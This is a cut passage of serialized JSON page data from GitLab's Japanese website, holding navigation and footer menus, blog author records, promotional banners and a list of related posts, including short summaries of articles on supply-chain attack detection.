videos",{"text":1224,"config":1225},"インテグレーション",{"href":1226,"dataGaName":1227,"dataGaLocation":1032},"/ja-jp/integrations/","integrations",{"title":1229,"items":1230},"検索する",[1231,1236,1241,1245],{"text":1232,"config":1233},"お客様成功事例",{"href":1234,"dataGaName":1235,"dataGaLocation":1032},"/ja-jp/customers/","customer success stories",{"text":1237,"config":1238},"ブログ",{"href":1239,"dataGaName":1240,"dataGaLocation":1032},"/ja-jp/blog/","blog",{"text":1242,"config":1243},"The Source",{"href":1244,"dataGaName":1240,"dataGaLocation":1032},"/ja-jp/the-source/",{"text":1246,"config":1247},"リモート",{"href":1248,"dataGaName":1249,"dataGaLocation":1032},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":1251,"items":1252},"つなげる",[1253,1258,1263,1268,1272],{"text":1254,"config":1255},"GitLabサービス",{"href":1256,"dataGaName":1257,"dataGaLocation":1032},"/ja-jp/services/","services",{"text":1259,"config":1260},"コミュニティ",{"href":1261,"dataGaName":1262,"dataGaLocation":1032},"/community/","community",{"text":1264,"config":1265},"フォーラム",{"href":1266,"dataGaName":1267,"dataGaLocation":1032},"https://forum.gitlab.com/","forum",{"text":826,"config":1269},{"href":1270,"dataGaName":1271,"dataGaLocation":1032},"/events/","events",{"text":1273,"config":1274},"パートナー",{"href":1275,"dataGaName":1276,"dataGaLocation":1032},"/ja-jp/partners/","partners",{"config":1278,"title":1281,"text":1282,"link":1283},{"background":1279,"textColor":1280},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","GitLabの最新情報","最新の機能と改善点に関する情報をお届けします。",{"text":1284,"config":1285},"最新情報を読む",{"href":1286,"dataGaName":1287,"dataGaLocation":1032},"/ja-jp/whats-new/","whats new",{"text":1289,"config":1290,"menu":1292},"企業情報",{"dataNavLevelOne":1291},"company",{"type":1083,"columns":1293},[1294],{"items":1295},[1296,1301,1307,1309,1314,1319,1324,1329,1334,1339],{"text":1297,"config":1298},"GitLabについて",{"href":1299,"dataGaName":1300,"dataGaLocation":1032},"/ja-jp/company/","about",{"text":1302,"config":1303,"footerGa":1306},"採用情報",{"href":1304,"dataGaName":1305,"dataGaLocation":1032},"/jobs/","jobs",{"dataGaName":1305},{"text":826,"config":1308},{"href":1270,"dataGaName":1271,"dataGaLocation":1032},{"text":1310,"config":1311},"経営陣",{"href":1312,"dataGaName":1313,"dataGaLocation":1032},"/company/team/e-group/","leadership",{"text":1315,"config":1316},"ハンドブック",{"href":1317,"dataGaName":1318,"dataGaLocation":1032},"https://handbook.gitlab.com/","handbook",{"text":1320,"config":1321},"投資家向け情報",{"href":1322,"dataGaName":1323,"dataGaLocation":1032},"https://ir.gitlab.com/","investor relations",{"text":1325,"config":1326},"トラストセンター",{"href":1327,"dataGaName":1328,"dataGaLocation":1032},"/ja-jp/security/","trust center",{"text":1330,"config":1331},"AI Transparency Center",{"href":1332,"dataGaName":1333,"dataGaLocation":1032},"/ja-jp/ai-transparency-center/","ai transparency center",{"text":1335,"config":1336},"ニュースレター",{"href":1337,"dataGaName":1338,"dataGaLocation":1032},"/company/contact/#contact-forms","newsletter",{"text":1340,"config":1341},"プレス",{"href":1342,"dataGaName":1343,"dataGaLocation":1032},"/press/","press",{"text":1345,"config":1346,"menu":1347},"お問い合わせ",{"dataNavLevelOne":1291},{"type":1083,"columns":1348},[1349],{"items":1350},[1351,1354,1359],{"text":1039,"config":1352},{"href":1041,"dataGaName":1353,"dataGaLocation":1032},"talk to sales",{"text":1355,"config":1356},"サポートを受ける",{"href":1357,"dataGaName":1358,"dataGaLocation":1032},"https://support.gitlab.com","support portal",{"text":1360,"config":1361},"カスタマーポータル",{"href":1362,"dataGaName":1363,"dataGaLocation":1032},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":1365,"login":1366,"suggestions":1373},"閉じる",{"text":1367,"link":1368},"リポジトリとプロジェクトを検索するには、次にログインします",{"text":1369,"config":1370},"GitLab.com",{"href":1046,"dataGaName":1371,"dataGaLocation":1372},"search login","search",{"text":1374,"default":1375},"提案",[1376,1378,1383,1385,1389,1393],{"text":1063,"config":1377},{"href":1068,"dataGaName":1063,"dataGaLocation":1372},{"text":1379,"config":1380},"コード提案（AI）",{"href":1381,"dataGaName":1382,"dataGaLocation":1372},"/ja-jp/solutions/code-suggestions/","Code Suggestions (AI)",{"text":1099,"config":1384},{"href":1101,"dataGaName":1099,"dataGaLocation":1372},{"text":1386,"config":1387},"GitLab on AWS",{"href":1388,"dataGaName":1386,"dataGaLocation":1372},"/ja-jp/partners/technology-partners/aws/",{"text":1390,"config":1391},"GitLab on Google Cloud",{"href":1392,"dataGaName":1390,"dataGaLocation":1372},"/ja-jp/partners/technology-partners/google-cloud-platform/",{"text":1394,"config":1395},"GitLabを選ぶ理由",{"href":1076,"dataGaName":1396,"dataGaLocation":1372},"Why GitLab?",{"freeTrial":1398,"mobileIcon":1402,"desktopIcon":1407,"secondaryButton":1410},{"text":1034,"config":1399},{"href":1400,"dataGaName":1037,"dataGaLocation":1401},"https://gitlab.com/-/trials/new/","nav",{"altText":1403,"config":1404},"GitLabアイコン",{"src":1405,"dataGaName":1406,"dataGaLocation":1401},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":1403,"config":1408},{"src":1409,"dataGaName":1406,"dataGaLocation":1401},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":1196,"config":1411},{"href":1412,"dataGaName":1413,"dataGaLocation":1401},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/ja-jp/get-started/","get started",{"freeTrial":1415,"mobileIcon":1419,"desktopIcon":1421},{"text":1416,"config":1417},"GitLab Duoの詳細について",{"href":1068,"dataGaName":1418,"dataGaLocation":1401},"gitlab duo",{"altText":1403,"config":1420},{"src":1405,"dataGaName":1406,"dataGaLocation":1401},{"altText":1403,"config":1422},{"src":1409,"dataGaName":1406,"dataGaLocation":1401},{"button":1424,"mobileIcon":1429,"desktopIcon":1431},{"text":1425,"config":1426},"/switch",{"href":1427,"dataGaName":1428,"dataGaLocation":1401},"#contact","switch",{"altText":1403,"config":1430},{"src":1405,"dataGaName":1406,"dataGaLocation":1401},{"altText":1403,"config":1432},{"src":1433,"dataGaName":1406,"dataGaLocation":1401},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":1435,"mobileIcon":1440,"desktopIcon":1442},{"text":1436,"config":1437},"料金ページに戻る",{"href":1183,"dataGaName":1438,"dataGaLocation":1401,"icon":1439},"back to pricing","GoBack",{"altText":1403,"config":1441},{"src":1405,"dataGaName":1406,"dataGaLocation":1401},{"altText":1403,"config":1443},{"src":1409,"dataGaName":1406,"dataGaLocation":1401},{"title":1445,"button":1446,"config":1451},"エージェント型AIがソフトウェアデリバリーをどのように変革するかをご覧ください",{"text":1447,"config":1448},"6月18日のGitLab Transcend日本開催版に申し込む",{"href":1449,"dataGaName":1450,"dataGaLocation":1032},"/ja-jp/events/transcend/virtual/","transcend event",{"layout":1452,"disabled":1017},"release",{"data":1454},{"text":1455,"source":1456,"edit":1462,"contribute":1467,"config":1472,"items":1477,"minimal":1685},"GitはSoftware Freedom Conservancyの商標です。当社は「GitLab」をライセンスに基づいて使用しています",{"text":1457,"config":1458},"ページのソースを表示",{"href":1459,"dataGaName":1460,"dataGaLocation":1461},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":1463,"config":1464},"このページを編集",{"href":1465,"dataGaName":1466,"dataGaLocation":1461},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":1468,"config":1469},"ご協力をお願いします",{"href":1470,"dataGaName":1471,"dataGaLocation":1461},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":1473,"facebook":1474,"youtube":1475,"linkedin":1476},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[1478,1523,1576,1620,1652],{"title":1181,"links":1479,"subMenu":1494},[1480,1484,1489],{"text":1481,"config":1482},"プランの表示",{"href":1183,"dataGaName":1483,"dataGaLocation":1461},"view plans",{"text":1485,"config":1486},"Premiumを選ぶ理由",{"href":1487,"dataGaName":1488,"dataGaLocation":1461},"/ja-jp/pricing/premium/","why premium",{"text":1490,"config":1491},"Ultimateを選ぶ理由",{"href":1492,"dataGaName":1493,"dataGaLocation":1461},"/ja-jp/pricing/ultimate/","why ultimate",[1495],{"title":1345,"links":1496},[1497,1499,1501,1503,1508,1513,1518],{"text":1345,"config":1498},{"href":1041,"dataGaName":1042,"dataGaLocation":1461},{"text":1355,"config":1500},{"href":1357,"dataGaName":1358,"dataGaLocation":1461},{"text":1360,"config":1502},{"href":1362,"dataGaName":1363,"dataGaLocation":1461},{"text":1504,"config":1505},"ステータス",{"href":1506,"dataGaName":1507,"dataGaLocation":1461},"https://status.gitlab.com/","status",{"text":1509,"config":1510},"利用規約",{"href":1511,"dataGaName":1512,"dataGaLocation":1461},"/terms/","terms of use",{"text":1514,"config":1515},"プライバシーに関する声明",{"href":1516,"dataGaName":1517,"dataGaLocation":1461},"/ja-jp/privacy/","privacy statement",{"text":1519,"config":1520},"Cookie 優先設定",{"dataGaName":1521,"dataGaLocation":1461,"id":1522,"isOneTrustButton":1011},"cookie preferences","ot-sdk-btn",{"title":1079,"links":1524,"subMenu":1533},[1525,1529],{"text":1526,"config":1527},"DevSecOpsプラットフォーム",{"href":1061,"dataGaName":1528,"dataGaLocation":1461},"devsecops platform",{"text":1530,"config":1531},"AI支援開発",{"href":1068,"dataGaName":1532,"dataGaLocation":1461},"ai-assisted development",[1534],{"title":1535,"links":1536},"トピック",[1537,1541,1546,1551,1556,1561,1566,1571],{"text":1099,"config":1538},{"href":1539,"dataGaName":1540,"dataGaLocation":1461},"/ja-jp/topics/ci-cd/","cicd",{"text":1542,"config":1543},"GitOps",{"href":1544,"dataGaName":1545,"dataGaLocation":1461},"/ja-jp/topics/gitops/","gitops",{"text":1547,"config":1548},"DevOps",{"href":1549,"dataGaName":1550,"dataGaLocation":1461},"/ja-jp/topics/devops/","devops",{"text":1552,"config":1553},"バージョン管理",{"href":1554,"dataGaName":1555,"dataGaLocation":1461},"/ja-jp/topics/version-control/","version control",{"text":1557,"config":1558},"DevSecOps",{"href":1559,"dataGaName":1560,"dataGaLocation":1461},"/ja-jp/topics/devsecops/","devsecops",{"text":1562,"config":1563},"クラウドネイティブ",{"href":1564,"dataGaName":1565,"dataGaLocation":1461},"/ja-jp/topics/cloud-native/","cloud native",{"text":1567,"config":1568},"コーディングのためのAI",{"href":1569,"dataGaName":1570,"dataGaLocation":1461},"/ja-jp/topics/devops/ai-for-coding/","ai for coding",{"text":1572,"config":1573},"エージェント型AI",{"href":1574,"dataGaName":1575,"dataGaLocation":1461},"/ja-jp/topics/agentic-ai/","agentic ai",{"title":1577,"links":1578},"ソリューション",[1579,1582,1584,1589,1593,1596,1599,1602,1605,1607,1610,1615],{"text":1124,"config":1580},{"href":1119,"dataGaName":1581,"dataGaLocation":1461},"Application Security Testing",{"text":1111,"config":1583},{"href":1095,"dataGaName":1096,"dataGaLocation":1461},{"text":1585,"config":1586},"アジャイル開発",{"href":1587,"dataGaName":1588,"dataGaLocation":1461},"/ja-jp/solutions/agile-delivery/","agile delivery",{"text":1590,"config":1591},"SCM",{"href":1108,"dataGaName":1592,"dataGaLocation":1461},"source code management",{"text":1099,"config":1594},{"href":1101,"dataGaName":1595,"dataGaLocation":1461},"continuous integration & delivery",{"text":1150,"config":1597},{"href":1152,"dataGaName":1598,"dataGaLocation":1461},"value stream management",{"text":1542,"config":1600},{"href":1601,"dataGaName":1545,"dataGaLocation":1461},"/ja-jp/solutions/gitops/",{"text":1603,"config":1604},"エンタープライズ",{"href":1166,"dataGaName":1167,"dataGaLocation":1461},{"text":1169,"config":1606},{"href":1172,"dataGaName":1173,"dataGaLocation":1461},{"text":1608,"config":1609},"公共機関",{"href":1178,"dataGaName":1179,"dataGaLocation":1461},{"text":1611,"config":1612},"教育",{"href":1613,"dataGaName":1614,"dataGaLocation":1461},"/ja-jp/solutions/education/","education",{"text":1616,"config":1617},"金融サービス",{"href":1618,"dataGaName":1619,"dataGaLocation":1461},"/ja-jp/solutions/finance/","financial services",{"title":1621,"links":1622},"リソース",[1623,1625,1627,1629,1633,1635,1638,1640,1642,1644,1646,1648,1650],{"text":1199,"config":1624},{"href":1201,"dataGaName":1202,"dataGaLocation":1461},{"text":1204,"config":1626},{"href":1206,"dataGaName":1207,"dataGaLocation":1461},{"text":1209,"config":1628},{"href":1211,"dataGaName":1212,"dataGaLocation":1461},{"text":1214,"config":1630},{"href":1631,"dataGaName":1632,"dataGaLocation":1461},"https://docs.gitlab.com/ja-jp/","docs",{"text":1237,"config":1634},{"href":1239,"dataGaName":1240,"dataGaLocation":1461},{"text":1636,"config":1637},"新着情報",{"href":1286,"dataGaName":1287,"dataGaLocation":1461},{"text":1232,"config":1639},{"href":1234,"dataGaName":1235,"dataGaLocation":1461},{"text":1246,"config":1641},{"href":1248,"dataGaName":1249,"dataGaLocation":1461},{"text":1254,"config":1643},{"href":1256,"dataGaName":1257,"dataGaLocation":1461},{"text":1259,"config":1645},{"href":1261,"dataGaName":1262,"dataGaLocation":1461},{"text":1264,"config":1647},{"href":1266,"dataGaName":1267,"dataGaLocation":1461},{"text":826,"config":1649},{"href":1270,"dataGaName":1271,"dataGaLocation":1461},{"text":1273,"config":1651},{"href":1275,"dataGaName":1276,"dataGaLocation":1461},{"title":1653,"links":1654},"会社情報",[1655,1657,1659,1661,1663,1665,1669,1674,1676,1678,1680],{"text":1297,"config":1656},{"href":1299,"dataGaName":1291,"dataGaLocation":1461},{"text":1302,"config":1658},{"href":1304,"dataGaName":1305,"dataGaLocation":1461},{"text":1310,"config":1660},{"href":1312,"dataGaName":1313,"dataGaLocation":1461},{"text":1315,"config":1662},{"href":1317,"dataGaName":1318,"dataGaLocation":1461},{"text":1320,"config":1664},{"href":1322,"dataGaName":1323,"dataGaLocation":1461},{"text":1666,"config":1667},"Sustainability",{"href":1668,"dataGaName":1666,"dataGaLocation":1461},"/sustainability/",{"text":1670,"config":1671},"ダイバーシティ、インクルージョン、ビロンギング（DIB）",{"href":1672,"dataGaName":1673,"dataGaLocation":1461},"/ja-jp/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":1325,"config":1675},{"href":1327,"dataGaName":1328,"dataGaLocation":1461},{"text":1335,"config":1677},{"href":1337,"dataGaName":1338,"dataGaLocation":1461},{"text":1340,"config":1679},{"href":1342,"dataGaName":1343,"dataGaLocation":1461},{"text":1681,"config":1682},"現代奴隷制の透明性に関する声明",{"href":1683,"dataGaName":1684,"dataGaLocation":1461},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":1686},[1687,1689,1692],{"text":1509,"config":1688},{"href":1511,"dataGaName":1512,"dataGaLocation":1461},{"text":1690,"config":1691},"Cookieの設定",{"dataGaName":1521,"dataGaLocation":1461,"id":1522,"isOneTrustButton":1011},{"text":1514,"config":1693},{"href":1516,"dataGaName":1517,"dataGaLocation":1461},[1695,1709],{"id":1696,"title":7,"body":1010,"config":1697,"content":1699,"description":1010,"extension":1703,"meta":1704,"navigation":1011,"path":1705,"seo":1706,"stem":1707,"__hash__":1708},"blogAuthors/en-us/blog/authors/dinesh-bolkensteyn.yml",{"template":1698},"BlogAuthor",{"name":7,"config":1700},{"headshot":1701,"ctfId":1702},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1781016491/cs30c757njvhqnyizzmn.jpg","EpylYWgjPmFOL5NX3Zxmk","yml",{},"/en-us/blog/authors/dinesh-bolkensteyn",{},"en-us/blog/authors/dinesh-bolkensteyn","Pv3nFIJV4WoNXz6FcpkaLOBx8QTtXH1KIVGmxt1GGME",{"id":1710,"title":8,"body":1010,"config":1711,"content":1713,"description":1010,"extension":1703,"meta":1716,"navigation":1011,"path":1717,"seo":1718,"stem":1719,"__hash__":1720},"blogAuthors/en-us/blog/authors/daniel-abeles.yml",{"template":1698,"gitlabHandle":1712},"dabeles",{"name":8,"config":1714},{"headshot":1715},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1764021550/s0jlolynjykik4qzfznr.png",{},"/en-us/blog/authors/daniel-abeles",{},"en-us/blog/authors/daniel-abeles","Jk9qNn2qJBh633zCEZSFpYFUYNt83twJ-Ge9wrn_oT0",[1722,1730,1737],{"title":1723,"description":1724,"heroImage":1725,"category":1006,"date":1726,"authors":1727,"slug":1729,"externalUrl":1010},"GitLab CI/CDとDuoで自動検知テストフレームワークを構築する","GitLabのSignals Engineeringチームが構築したWATCHフレームワークを通じて、セキュリティ監視パイプラインを継続的に検証する方法をご紹介します。","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","2026-04-30",[1728],"Evan Baltman","automated-detection-testing-framework",{"title":1731,"description":1732,"heroImage":1012,"category":1006,"date":1733,"authors":1734,"slug":1736,"externalUrl":1010},"3月のサプライチェーン攻撃から学ぶパイプラインセキュリティ","2026年3月、Trivy・Checkmarx KICS・LiteLLM・axiosが次々と侵害されました。GitLabの集中管理されたパイプライン実行ポリシーが、これらのサプライチェーン攻撃パターンをどのように検出・ブロックできるかをご紹介します。","2026-04-07",[1735],"Grant Hickman","pipeline-security-lessons-from-march-supply-chain-incidents",{"title":1738,"description":1739,"heroImage":1740,"category":1006,"date":1741,"authors":1742,"slug":1744,"externalUrl":1010},"GitLabがnpmサプライチェーンへの大規模攻撃を発見","攻撃を引き起こすマルウェアには、ユーザーデータを破壊する「デッドマンスイッチ」が含まれています。","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg","2025-11-24",[1743,8],"Michael Henriksen","gitlab-discovers-widespread-npm-supply-chain-attack",{"promotions":1746},[1747,1761,1773,1784],{"id":1748,"categories":1749,"header":1751,"text":1752,"button":1753,"image":1758},"ai-modernization",[1750],"ai","AIの真価、組織全体で発揮できていますか？","所要時間は5分以内です",{"text":1754,"config":1755},"AI成熟度スコアを確認する",{"href":1756,"dataGaName":1757,"dataGaLocation":1240},"/ja-jp/assessments/ai-modernization-assessment/","modernization assessment",{"config":1759},{"src":1760},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":1762,"categories":1763,"header":1765,"text":1752,"button":1766,"image":1770},"devops-modernization",[1764,1560],"product","単にツールを管理するだけでなく、イノベーションを提供していますか？",{"text":1767,"config":1768},"DevOps成熟度スコアを確認しましょう",{"href":1769,"dataGaName":1757,"dataGaLocation":1240},"/ja-jp/assessments/devops-modernization-assessment/",{"config":1771},{"src":1772},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":1774,"categories":1775,"header":1776,"text":1752,"button":1777,"image":1781},"security-modernization",[1022],"スピードのためにセキュリティを犠牲にしていませんか？",{"text":1778,"config":1779},"セキュリティ成熟度スコアを確認しましょう",{"href":1780,"dataGaName":1757,"dataGaLocation":1240},"/ja-jp/assessments/security-modernization-assessment/",{"config":1782},{"src":1783},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":1785,"paths":1786,"header":1789,"text":1790,"button":1791,"image":1796},"github-azure-migration",[1787,1788],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","チームはGitHubのAzure移行に対応できていますか？","GitHubはすでにAzureを基盤として再構築を進めています。それがあなたのチームにとって何を意味するのか、ご確認ください。",{"text":1792,"config":1793},"GitLabとGitHubの比較を見る",{"href":1794,"dataGaName":1795,"dataGaLocation":1240},"/ja-jp/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":1797},{"src":1772},{"header":1799,"blurb":1800,"button":1801,"secondaryButton":1805},"今すぐ開発をスピードアップ","DevSecOpsに特化したインテリジェントオーケストレーションプラットフォームで実現できることをご確認ください。\n",{"text":1034,"config":1802},{"href":1803,"dataGaName":1037,"dataGaLocation":1804},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/ja-jp/","feature",{"text":1345,"config":1806},{"href":1041,"dataGaName":1042,"dataGaLocation":1804},1781392835169]